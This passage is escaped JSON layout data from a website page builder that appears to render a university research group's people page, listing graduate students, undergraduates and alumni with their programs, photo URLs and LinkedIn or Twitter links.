e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassani\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c140\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Siv-photo.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1860,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c142\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sivgech Heang<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c140\",\"index\":2,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c140\",\"index\":3,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sivgech-heang-91842618a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c140\",\"index\":1,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c228\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c228\",\"index\":0,\"id\":\"182-c229\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Shreyatadipaneni.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1875,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c228\",\"index\":0,\"id\":\"182-c230\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shreya Tadipaneni<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c228\",\"index\":2,\"id\":\"182-c231\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c228\",\"index\":3,\"id\":\"182-c232\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shreya-tadipaneni-22a4451a6\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c228\",\"index\":1,\"id\":\"182-c233\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c234\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c234\",\"index\":0,\"id\":\"182-c235\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/Anshul-Gupta.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1876,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c234\",\"index\":0,\"id\":\"182-c236\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anshul Gupta<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c234\",\"index\":2,\"id\":\"182-c237\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c234\",\"index\":3,\"id\":\"182-c238\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anshulgupta-panther\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c234\",\"index\":1,\"id\":\"182-c239\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c74\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c73\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c148\",\"parentId\":\"182-c147\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c147\",\"parentId\":\"182-c146\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c146\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c151\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c151\",\"index\":2,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c151\",\"index\":1,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c150\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c149\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c158\",\"parentId\":\"182-c157\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c161\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c161\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c161\",\"index\":0,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c161\",\"index\":2,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c161\",\"index\":1,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c166\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c166\",\"index\":2,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c166\",\"index\":1,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c171\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c171\",\"index\":2,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c171\",\"index\":1,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c186\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c186\",\"index\":2,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c186\",\"index\":1,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c191\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c191\",\"index\":2,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c191\",\"index\":1,\"id\":\"182-c195\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c196\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c196\",\"index\":2,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c200\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c200\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c200\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c200\",\"index\":2,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c200\",\"index\":1,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c205\",\"parentId\":\"182-c160\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c207\",\"partialId\":182,\"styleR